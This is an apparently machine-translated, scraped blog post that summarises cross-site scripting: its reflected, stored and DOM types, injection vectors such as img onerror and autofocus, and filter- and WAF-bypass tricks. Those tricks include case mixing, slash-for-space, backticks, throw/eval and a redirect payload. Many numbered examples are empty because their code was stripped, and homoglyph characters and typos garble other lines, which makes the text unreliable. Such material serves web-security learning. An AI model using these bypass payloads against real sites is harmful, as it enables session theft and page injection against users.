xss filtering summary

Others 2021-01-25 10:21:23 views: null

One. Brief introduction

XSS attacks usually refer to the use of vulnerabilities left during web page development to inject malicious instruction codes into web pages through clever methods, so that users can load and execute web programs maliciously created by attackers.
For example:
1. Misusing cookies to obtain sensitive information .
2. Use embedded Flash to obtain higher authority through crossdomain authority setting; or use Java to get similar operation.
3. Use iframe, frame, XMLHttpRequest or the above Flash to perform some management actions as the (attacked) user, or perform some general operations such as sending Weibo, adding friends, sending private messages, etc.
4. Take advantage of the characteristic that the attackable domain is trusted by other domains, and request some operations that are normally not allowed as a trusted source, such as improper voting activities.
5. XSS on some pages with extremely high traffic can attack some small websites and achieve the effect of DDOS attack.

two. classification

Reflective
Reflective cross-site scripting is the most common and widely used one, which can attach malicious scripts to the parameters of URL addresses. Reflected XSS is generally used by attackers to induce users to visit a URL containing malicious code through specific methods (such as email). When the victim clicks on these specially designed links, the malicious code will be directly on the victim's host. Execute on the browser. This type of XSS usually appears in the search bar of the website, the user's login port, etc., and is often used to steal client cookies or phishing.

Stored-type
persistent cross-site scripting is also equivalent to stored-type cross-site scripting. This type of XSS does not require the user to click on a specific URL to execute cross-site scripting. The attacker uploads or stores malicious code in the vulnerable server in advance. As long as the victim browses the page containing this malicious code, the malicious code will be executed. Persistent XSS generally appears in interactions such as website messages, comments, and blog logs, and malicious scripts are stored in the database of the client or server.

DOM type
Traditional XSS vulnerabilities generally appear in server-side code, and browser users can manipulate some objects in the DOM, such as URL, location, etc. If the data entered by the user on the client contains malicious JavaScript scripts, and these scripts are not properly filtered and disinfected, the application may be attacked by DOM-based XSS. (Special type of reflectivity) Exist in get
cookio reference.

three. Without filtering

Some common tags
1.

2.
<img src=1 οnerrοr=alert(“xss”);>

3.

Competing for focus, triggering the onblur event
<input οnblur=alert("xss") autofocus>

Execute its own focus event through the autofocus attribute, this vector is to make the focus automatically jump to the input element, trigger the focus
event, without the user to trigger

4.

Use the open attribute to trigger the ontoggle event without the user to trigger

5.

6.

Execute its own focus event through the autofocus attribute, this vector is to make the focus automatically jump to the input element, trigger the focus event, without the user to trigger

7.

javascript pseudo protocol

1. Label
xss

Click on the xss
2. label

3. Tag
<img src=javascript:alert('xss')>//Below IE7
4. Tag

four. With filtering

1. Filter spaces
Use / instead of spaces
<img/src="x"/οnerrοr=alert("xss");>

2. Filter keyword
case bypass
<ImG sRc=x onerRor=alert("xss");>

3. Character splicing
using eval

Use top

4. Other character confusion
Some wafs may use regular expressions to detect xss attacks. If we can fuzz out regular rules,
we can use other characters to confuse the code we injected.
Here are a few simple example

The priority of annotations, tags, etc. can be used
1.<

5. Encoding bypass
Unicode encoding bypass

url encoding bypass

Ascii code bypass

6. Filter double quotes and single quotes
. If it is in html tags, we can not use quotes. If it is in js, we can use backticks instead of single and double quotes
<img src="x" οnerrοr=alert( xss);>

7. Filter brackets
When brackets are filtered, you can use throw to bypass
<svg/οnlοad="window.οnerrοr=eval;throw'=alert\x281\x29';">

8. Use // in the html tag to replace http://
<img src="x" οnerrοr=document.location= //www.baidu.com>

9. Comment bypass

Most shopping mall search boxes can be bypassed this way.
</spa n>

Guess you like

Origin blog.csdn.net/weixin_42109829/article/details/103379132
xss
Recommended
Open Source Daily | Linus declares war on "passive voice"; the big language model that understands human nature best; native Hongmeng is a new technical framework; open source version of Bloomberg terminal; big model "eats free food hard"
Ranking
Flutter-desktop
container 和container-fluid
One point nearly three cut Long Baoying skills invitation code 88118877
jsonEditor usage
Installation and use of Git (super detailed tutorial)
深入理解Moby Buildkit系列 #25 - Pipe设计原理
flinkcdc data collection code FlinkAPI
[Problem] Record compile-time error cordova: CordovaLib: _internal_aapt2_binary
Idea view properties Chinese into unicode code how to solve
mpvue build WeChat applet project
Daily
More
2024-10-09(1)
2024-10-08(1)
2024-10-07(1)
2024-10-06(15)
2024-10-05(7)
2024-10-04(1)
2024-10-03(7)
2024-10-02(1)
2024-10-01(0)
2024-09-30(0)

Code World

© 2018 codetd.com